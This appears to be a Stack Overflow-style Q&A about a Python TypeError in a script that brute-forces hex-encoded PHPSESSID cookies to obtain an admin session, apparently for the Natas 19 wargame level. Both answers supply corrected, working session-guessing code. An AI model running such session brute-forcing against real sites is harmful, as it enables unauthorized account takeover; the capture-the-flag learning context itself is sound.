Python请求 - Cookies错误

Question

I am trying to bruteforce a session via sending random cookies until the correct cookie gives me an admin session. I am using python 3.6 on Windows 10.

The cookie I want to use is PHPSESSID and I have set it to a hex encoded string consisting of "#-admin". The website gives a random PHPSESSID that is hex encoded, but only the number changes ('-admin' is consistent after every refresh). The source code maxes out the number to 640 hence the range.

The code is below:

for x in range(1,641):
    if x % 10 == 0:
        print (str(x) + ' Sessions Tested')
    cookies = dict(PHPSESSID=(binascii.hexlify(str(x).encode('ascii')+b'-admin')))
    r = requests.get(target, cookies=cookies)
    if r.text.find(trueStr) != -1:
        print ('Got it!')

I receive the following error after running the script on windows:

Traceback (most recent call last):
  File "natas19.py", line 14, in <module>
    r = requests.get(target, cookies=cookies)
  File "C:\Users\e403sa\AppData\Local\Programs\Python\Python36-32\lib\site-packages\requests-2.18.4-py3.6.egg\requests\api.py", line 72, in get
    return request('get', url, params=params, **kwargs)
  File "C:\Users\e403sa\AppData\Local\Programs\Python\Python36-32\lib\site-packages\requests-2.18.4-py3.6.egg\requests\api.py", line 58, in request
    return session.request(method=method, url=url, **kwargs)
  File "C:\Users\e403sa\AppData\Local\Programs\Python\Python36-32\lib\site-packages\requests-2.18.4-py3.6.egg\requests\sessions.py", line 494, in request
    prep = self.prepare_request(req)
  File "C:\Users\e403sa\AppData\Local\Programs\Python\Python36-32\lib\site-packages\requests-2.18.4-py3.6.egg\requests\sessions.py", line 415, in prepare_request
    cookies = cookiejar_from_dict(cookies)
  File "C:\Users\e403sa\AppData\Local\Programs\Python\Python36-32\lib\site-packages\requests-2.18.4-py3.6.egg\requests\cookies.py", line 518, in cookiejar_from_dict
    cookiejar.set_cookie(create_cookie(name, cookie_dict[name]))
  File "C:\Users\e403sa\AppData\Local\Programs\Python\Python36-32\lib\site-packages\requests-2.18.4-py3.6.egg\requests\cookies.py", line 345, in set_cookie
    if hasattr(cookie.value, 'startswith') and cookie.value.startswith('"') and cookie.value.endswith('"'):
TypeError: startswith first arg must be bytes or a tuple of bytes, not str

I have no idea where to start. I followed the documentation for python requests. Any suggestions on where to look would be greatly appreciated.

Answer 1

Cookie values must be str objects, but binascii.hexlify() returns a bytes object:

>>> import binascii
>>> x = 1
>>> binascii.hexlify(str(x).encode('ascii')+b'-admin')
b'312d61646d696e'

Decode that first:

cookies = {
    'PHPSESSID': binascii.hexlify(b'%d-admin' % x).decode('ascii')
}

Answer 2

In your example, cookies is a dict set by:

dict(PHPSESSID=(binascii.hexlify(str(x).encode('ascii') + b'-admin')))

If you break up the steps of that one-liner, you'll see the problem:

>>> binascii.hexlify(str(x).encode('ascii') + b'-admin')
b'312d61646d696e'
>>> b'312d61646d696e'.startswith('3')
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
TypeError: startswith first arg must be bytes or a tuple of bytes, not str

You're performing a bytes operation with a str first arg. Since it's the requests package managing your cookies, convert the value to a str before setting PHPSESSID .

for x in range(1,641):
    if x % 10 == 0:
        print (str(x) + ' Sessions Tested')
    b_sess_id = binascii.hexlify(str(x).encode('ascii')+b'-admin'))
    cookies = dict(PHPSESSID=b_sess_id.decode())
    r = requests.get(target, cookies=cookies)
    if r.text.find(trueStr) != -1:
        print ('Got it!')